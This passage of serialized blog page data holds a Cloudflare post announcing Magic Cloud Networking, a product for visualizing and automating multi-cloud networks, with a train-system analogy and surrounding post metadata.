Gateway"],"slug":[0,"gateway"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Ankur Aggarwal"],"slug":[0,"ankur"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5jlZmfW8yTju4mM7ILqZTR/3adcdef58140a276c6586f81e4fdbecc/ankur.jpeg"],"location":[0,null],"website":[0,null],"twitter":[0,"@Encore_Encore"],"facebook":[0,null]}]]],"meta_description":[0,"Cloudflare Gateway, our secure web gateway (SWG), now supports the detection, logging, and filtering of network protocols using packet payloads without the need for inspection. Protocol detection makes it easier to set precise policies without filtering specific ports and without the risk of over/under-blocking activity."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Protocol detection with Cloudflare Gateway Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"No Page for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"No Page for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"No Page for Locale"],"koKR":[0,"No Page for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/gatway-protocol-detection"],"metadata":[0,{"title":[0,"Protocol detection with Cloudflare Gateway"],"description":[0,"Cloudflare Gateway, our secure web gateway (SWG), now supports the detection, logging, and filtering of network protocols using packet payloads without the need for inspection. Protocol detection makes it easier to set precise policies without filtering specific ports and without the risk of over/under-blocking activity."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7B633sqRFzFzOtZ7ZxrAOT/dcbc453a579915fafead0889cbdff280/gatway-protocol-detection-Keb56J.png"]}]}],[0,{"id":[0,"2qMDjBOoY9rSrSaeNzUDzL"],"title":[0,"Magic Cloud Networking simplifies security, connectivity, and management of public clouds"],"slug":[0,"introducing-magic-cloud-networking"],"excerpt":[0,"Introducing Magic Cloud Networking, a new set of capabilities to visualize and automate cloud networks to give our customers secure, easy, and seamless connection to public cloud environments"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4EE4QTE18JtBWAk0XucBb2/818464eba98f9928bbfa7bfe179780d8/image5-5.png\" alt=\"Magic Cloud Networking simplifies security, connectivity, and management of public clouds\" class=\"kg-image\" width=\"1800\" height=\"1013\" loading=\"lazy\"/>\n \n </figure><p>Today we are excited to announce Magic Cloud Networking, supercharged by <a href=\"https://www.cloudflare.com/press-releases/2024/cloudflare-enters-multicloud-networking-market-unlocks-simple-secure/\">Cloudflare’s recent acquisition of Nefeli Networks</a>’ innovative technology. These new capabilities to visualize and automate cloud networks will give our customers secure, easy, and seamless connection to public cloud environments.</p><p>Public clouds offer organizations a scalable and on-demand IT infrastructure without the overhead and expense of running their own datacenter. <a href=\"https://www.cloudflare.com/learning/cloud/what-is-cloud-networking/\">Cloud networking</a> is foundational to applications that have been migrated to the cloud, but is difficult to manage without automation software, especially when operating at scale across multiple cloud accounts. Magic Cloud Networking uses familiar concepts to provide a single interface that controls and unifies multiple cloud providers’ native network capabilities to create reliable, cost-effective, and secure cloud networks.</p><p>Nefeli’s approach to multi-cloud networking solves the problem of building and operating end-to-end networks within and across public clouds, allowing organizations to <a href=\"https://www.cloudflare.com/application-services/solutions/\">securely leverage applications</a> spanning any combination of internal and external resources. Adding Nefeli’s technology will make it easier than ever for our customers to connect and protect their users, private networks and applications.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"why-is-cloud-networking-difficult\">Why is cloud networking difficult?</h2>\n <a href=\"#why-is-cloud-networking-difficult\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Compared with a traditional on-premises data center network, cloud networking promises simplicity:</p><ul><li><p>Much of the complexity of physical networking is abstracted away from users because the physical and ethernet layers are not part of the network service exposed by the cloud provider.</p></li><li><p>There are fewer control plane protocols; instead, the cloud providers deliver a simplified <a href=\"https://www.cloudflare.com/learning/network-layer/what-is-sdn/\">software-defined network (SDN)</a> that is fully programmable via API.</p></li><li><p>There is capacity — from zero up to very large — available instantly and on-demand, only charging for what you use.</p></li></ul><p>However, that promise has not yet been fully realized. Our customers have described several reasons cloud networking is difficult:</p><ul><li><p><b>Poor end-to-end visibility</b>: Cloud network visibility tools are difficult to use and silos exist even within single cloud providers that impede end-to-end monitoring and troubleshooting.</p></li><li><p><b>Faster pace</b>: Traditional IT management approaches clash with the promise of the cloud: instant deployment available on-demand. Familiar ClickOps and CLI-driven procedures must be replaced by automation to meet the needs of the business.</p></li><li><p><b>Different technology</b>: Established network architectures in on-premises environments do not seamlessly transition to a public cloud. The missing ethernet layer and advanced control plane protocols were critical in many network designs.</p></li><li><p><b>New cost models</b>: The dynamic pay-as-you-go usage-based cost models of the public clouds are not compatible with established approaches built around fixed cost circuits and 5-year depreciation. Network solutions are often architected with financial constraints, and accordingly, different architectural approaches are sensible in the cloud.</p></li><li><p><b>New security risks</b>: Securing public clouds with true <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">zero trust</a> and least-privilege demands mature operating processes and automation, and familiarity with cloud-specific policies and IAM controls.</p></li><li><p><b>Multi-vendor:</b> Oftentimes enterprise networks have used single-vendor sourcing to facilitate interoperability, operational efficiency, and targeted hiring and training. Operating a network that extends beyond a single cloud, into other clouds or on-premises environments, is a multi-vendor scenario.</p></li></ul><p>Nefeli considered all these problems and the tensions between different customer perspectives to identify where the problem should be solved.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"trains-planes-and-automation\">Trains, planes, and automation</h2>\n <a href=\"#trains-planes-and-automation\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Consider a train system. To operate effectively it has three key layers:</p><ul><li><p>tracks and trains</p></li><li><p>electronic signals</p></li><li><p>a company to manage the system and sell tickets.</p></li></ul><p>A train system with good tracks, trains, and signals could still be operating below its full potential because its agents are unable to keep up with passenger demand. The result is that passengers cannot plan itineraries or purchase tickets.</p><p>The train company eliminates bottlenecks in process flow by simplifying the schedules, simplifying the pricing, providing agents with better booking systems, and installing automated ticket machines. Now the same fast and reliable infrastructure of tracks, trains, and signals can be used to its full potential.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/342dyvSqIvF0hJJoCDyf0I/8e92b93f922412344fa34cbbea7a4be1/image8.png\" alt=\"\" class=\"kg-image\" width=\"1198\" height=\"270\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"solve-the-right-problem\">Solve the right problem</h3>\n <a href=\"#solve-the-right-problem\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>In networking, there are an analogous set of three layers, called the <a href=\"https://www.cloudflare.com/learning/network-layer/what-is-the-control-plane/\">networking planes</a>:</p><ul><li><p><b>Data Plane:</b> the network paths that transport data (in the form of packets) from source to destination.</p></li><li><p><b>Control Plane:</b> protocols and logic that change how packets are steered across the data plane.</p></li><li><p><b>Management Plane:</b> the configuration and monitoring interfaces for the data plane and control plane.</p></li></ul><p>In public cloud networks, these layers map to:</p><ul><li><p><b>Cloud Data Plane:</b> The underlying cables and devices are exposed to users as the <a href=\"https://www.cloudflare.com/learning/cloud/what-is-a-virtual-private-cloud/\">Virtual Private Cloud (VPC)</a> or Virtual Network (VNet) service that includes subnets, routing tables, security groups/ACLs and additional services such as load-balancers and VPN gateways.</p></li><li><p><b>Cloud Control Plane:</b> In place of distributed protocols, the cloud control plane is a <a href=\"https://www.cloudflare.com/learning/network-layer/what-is-sdn/\">software defined network (SDN)</a> that, for example, programs static route tables. (There is limited use of traditional control plane protocols, such as BGP to interface with external networks and ARP to interface with VMs.)</p></li><li><p><b>Cloud Management Plane:</b> An administrative interface with a UI and API which allows the admin to fully configure the data and control planes. It also provides a variety of monitoring and logging capabilities that can be enabled and integrated with 3rd party systems.</p></li></ul><p>Like our train example, most of the problems that our customers experience with cloud networking are in the third layer: the management plane.</p><p>Nefeli simplifies, unifies, and automates cloud network management and operations.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/nb9xcqGaRRaYIe0lvlbIs/83da6094ec1f7bc3e4a7d72a17fc511c/image2-6.png\" alt=\"\" class=\"kg-image\" width=\"1200\" height=\"250\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"avoid-cost-and-complexity\">Avoid cost and complexity</h3>\n <a href=\"#avoid-cost-and-complexity\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>One common approach to tackle management problems in cloud networks is introducing Virtual Network Functions (VNFs), which are <a href=\"https://www.cloudflare.com/learning/cloud/what-is-a-virtual-machine/\">virtual machines (VMs)</a> that do packet forwarding, in place of native cloud data plane constructs. Some VNFs are routers, firewalls, or load-balancers ported from a traditional network vendor’s hardware appliances, while others are software-based proxies often built on open-source projects like NGINX or Envoy. Because VNFs mimic their physical counterparts, IT teams could continue using familiar management tooling, but VNFs have downsides:</p><ul><li><p>VMs do not have custom network silicon and so instead rely on raw compute power. The VM is sized for the peak anticipated load and then typically runs 24x7x365. This drives a high cost of compute regardless of the actual utilization.</p></li><li><p>High-availability (HA) relies on fragile, costly, and complex network configuration.</p></li><li><p>Service insertion — the configuration to put a VNF into the packet flow — often forces packet paths that incur additional bandwidth charges.</p></li><li><p>VNFs are typically licensed similarly to their on-premises counterparts and are expensive.</p></li><li><p>VNFs lock in the enterprise and potentially exclude them benefitting from improvements in the cloud’s native data plane offerings.</p></li></ul><p>For these reasons, enterprises are turning away from VNF-based solutions and increasingly looking to rely on the native network capabilities of their cloud service providers. The built-in public cloud networking is elastic, performant, robust, and priced on usage, with high-availability options integrated and backed by the cloud provider’s service level agreement.</p><p>In our train example, the tracks and trains are good. Likewise, the cloud network data plane is highly capable. Changing the data plane to solve management plane problems is the wrong approach. To make this work at scale, organizations need a solution that works together with the native network capabilities of cloud service providers.</p><p>Nefeli leverages native cloud data plane constructs rather than third party VNFs.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"introducing-magic-cloud-networking\">Introducing Magic Cloud Networking</h2>\n <a href=\"#introducing-magic-cloud-networking\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The Nefeli team has joined Cloudflare to integrate cloud network management functionality with Cloudflare One. This capability is called Magic Cloud Networking and with it, enterprises can use the Cloudflare dashboard and API to manage their public cloud networks and connect with Cloudflare One.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"end-to-end\">End-to-end</h3>\n <a href=\"#end-to-end\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Just as train providers are focused only on completing train journeys in their own network, cloud service providers deliver network connectivity and tools within a single cloud account. Many large enterprises have hundreds of cloud accounts across multiple cloud providers. In an end-to-end network this creates disconnected networking silos which introduce operational inefficiencies and risk.</p><p>Imagine you are trying to organize a train journey across Europe, and no single train company serves both your origin and destination. You know they all offer the same basic service: a seat on a train. However, your trip is difficult to arrange because it involves multiple trains operated by different companies with their own schedules and ticketing rates, all in different languages!</p><p>Magic Cloud Networking is like an online travel agent that aggregates multiple transportation options, books multiple tickets, facilitates changes after booking, and then delivers travel status updates.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4P7EhpKlEfTnU7WdPq4dt6/4de908c385b406a89c97f4dc274b3acb/image6.png\" alt=\"\" class=\"kg-image\" width=\"1198\" height=\"270\" loading=\"lazy\"/>\n \n </figure><p>Through the Cloudflare dashboard, you can discover all of your network resources across accounts and cloud providers and visualize your end-to-end network in a single interface. Once Magic Cloud Networking discovers your networks, you can build a scalable network through a fully automated and simple workflow.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2qXuFK0Q1q96NtH0FYRNg0/3c449510b24a3f206b63b01e1799dddd/image3-8.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"1126\" loading=\"lazy\"/>\n \n </figure><p><i>Resource inventory shows all configuration in a single and responsive UI</i></p>\n <div class=\"flex anchor relative\">\n <h3 id=\"taming-per-cloud-complexity\">Taming per-cloud complexity</h3>\n <a href=\"#taming-per-cloud-complexity\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Public clouds are used to deliver applications and services. Each cloud provider offers a composable stack of modular building blocks (resources) that start with the foundation of a billing account and then add on security controls. The next foundational layer, for server-based applications, is VPC networking. Additional resources are built on the VPC network foundation until you have compute, storage, and network infrastructure to host the enterprise application and data. Even relatively simple architectures can be composed of hundreds of resources.</p><p>The trouble is, these resources expose abstractions that are different from the building blocks you would use to build a service on prem, the abstractions differ between cloud providers, and they form a web of dependencies with complex rules about how configuration changes are made (rules which differ between resource types and cloud providers). For example, say I create 100 VMs, and connect them to an IP network. Can I make changes to the IP network while the VMs are using the network? The answer: it depends.</p><p>Magic Cloud Networking handles these differences and complexities for you. It configures native cloud constructs such as VPN gateways, routes, and security groups to securely connect your cloud VPC network to Cloudflare One without having to learn each cloud’s incantations for creating VPN connections and hubs.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"continuous-coordinated-automation\">Continuous, coordinated automation</h3>\n <a href=\"#continuous-coordinated-automation\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Returning to our train system example, what if the railway maintenance staff find a dangerous fault on the railroad track? They manually set the signal to a stop light to prevent any oncoming trains using the faulty section of track. Then, what if, by unfortunate coincidence, the scheduling office is changing the signal schedule, and they set the signals remotely which clears the safety measure made by the maintenance crew? Now there is a problem that no one knows about and the root cause is that multiple authorities can change the signals via different interfaces without coordination.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/VNaeoX2TNwYwZsweytYSZ/40806d02108119204f638ed5f111d5d0/image1-10.png\" alt=\"\" class=\"kg-image\" width=\"1198\" height=\"270\" loading=\"lazy\"/>\n \n </figure><p>The same problem exists in cloud networks: configuration changes are made by different teams using different automation and configuration interfaces across a spectrum of roles such as billing, support, security, networking, firewalls, database, and application development.</p><p>Once your network is deployed, Magic Cloud Networking monitors its configuration and health, enabling you to be confident that the security and connectivity you put in place yesterday is still in place today. It tracks the cloud resources it is responsible for, automatically reverting drift if they are changed out-of-band, while allowing you to manage other resources, like storage buckets and application servers, with other automation tools. And, as you change your network, Cloudflare takes care of route management, injecting and withdrawing routes globally across Cloudflare and all connected cloud provider networks.</p><p>Magic Cloud Networking is fully programmable via API, and can be integrated into existing automation toolchains.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3h360ewBWWCRUjhqjrm6wF/5006f8267a880b98ccbe9bfc91cb9029/image7-1.png\" alt=\"\" class=\"kg-image\" width=\"1858\" height=\"964\" loading=\"lazy\"/>\n \n </figure><p><i>The interface warns when cloud network infrastructure drifts from intent</i></p>\n <div class=\"flex anchor relative\">\n <h2 id=\"ready-to-start-conquering-cloud-networking\">Ready to start conquering cloud networking?</h2>\n <a href=\"#ready-to-start-conquering-cloud-networking\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We are thrilled to introduce Magic Cloud Networking as another pivotal step to fulfilling the promise of the <a href=\"https://www.cloudflare.com/connectivity-cloud/\">Connectivity Cloud</a>. This marks our initial stride in empowering customers to seamlessly integrate Cloudflare with their public clouds to get securely connected, stay securely connected, and gain flexibility and cost savings as they go.</p><p>Join us on this journey for early access: learn more and sign up <a href=\"https://cloudflare.com/lp/cloud-networking/\">here</a>.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/610Vl5u7JVsnszRAmQz0Yt/3bb2a75f47826c1c1969c1d9b0c1db8d/image4-10.png\" alt=\"\" class=\"kg-image\" width=\"1197\" height=\"394\" loading=\"lazy\"/>\n \n </figure><p></p>"],"published_at":[0,"2024-03-06T14:01:00.000+00:00"],"updated_at":[0,"2024-11-22T17:39:08.669Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7prf3HIZQH8iTFEpduqzWi/35e97225c6f081bb9a37cbc62e925408/introducing-magic-cloud-networking.png"],"tags":[1,[[0,{"id":[0,"3DmitkNK6euuD5BlhuvOLW"],"name":[0,"Security Week"],"slug":[0,"security-week"]}],[0,{"id":[0,"1U6ifhBwTuaJ2w4pjNOzNT"],"name":[0,"Network"],"slug":[0,"network"]}],[0,{"id":[0,"4xYkcVnnMwHSYkL19IbOFd"],"name":[0,"AWS"],"slug":[0,"aws"]}],[0,{"id":[0,"4rZ8fMZpcTMTfeMlIh6pdJ"],"name":[0,"EC2"],"slug":[0,"ec2"]}],[0,{"id":[0,"2XaNX3TUr0DobetHd9z2GL"],"name":[0,"Google Cloud"],"slug":[0,"google-cloud"]}],[0,{"id":[0,"7DesEiF0a93BffoxYSQhnZ"],"name":[0,"Microsoft Azure"],"slug":[0,"microsoft-azure"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}],[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"LmZuA166CHwiK872QKArE"],"name":[0,"Multi-Cloud"],"slug":[0,"multi-cloud"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"7r0zxUQ3XCgTw2blCdlw55"],"name":[0,"Magic WAN"],"slug":[0,"magic-wan"]}],[0,{"id":[0,"5OywGP63AdM9Umyvaku8OP"],"name":[0,"Connectivity Cloud"],"slug":[0,"connectivity-cloud"]}],[0,{"id":[0,"013htAspXBEMdE76Afcyq2"],"name":[0,"Acquisitions"],"slug":[0,"acquisitions"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Steve Welham"],"slug":[0,"steve-welham"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/679xrn8iBw2qRBpukmwlTu/e4355a5139bcd20b9475710b9f329e4d/steve-welham.jpeg"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"David Naylor"],"slug":[0,"david-naylor"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2TWZ5jIgdY4CnmPmauUvim/81c84777f850d910fc6c44616c991faa/david-naylor.JPG"],"location":[0,null],"website":[0,"https://davidtnaylor.com/"],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"Introducing Magic Cloud Networking, a new set of capabilities to visualize and automate cloud networks to give our customers secure, easy, and seamless connection to public cloud environments."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Magic Cloud Networking simplifies security, connectivity, and management of public clouds Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"Translated for Locale"],"deDE":[0,"Translated for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"Translated for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/introducing-magic-cloud-networking"],"metadata":[0,{"title":[0,"Magic Cloud Networking simplifies security, connectivity, and management of public clouds"],"description":[0,"Introducing Magic Cloud Networking, a new set of capabilities to visualize and automate cloud networks to give our customers secure, easy, and seamless connection to public cloud 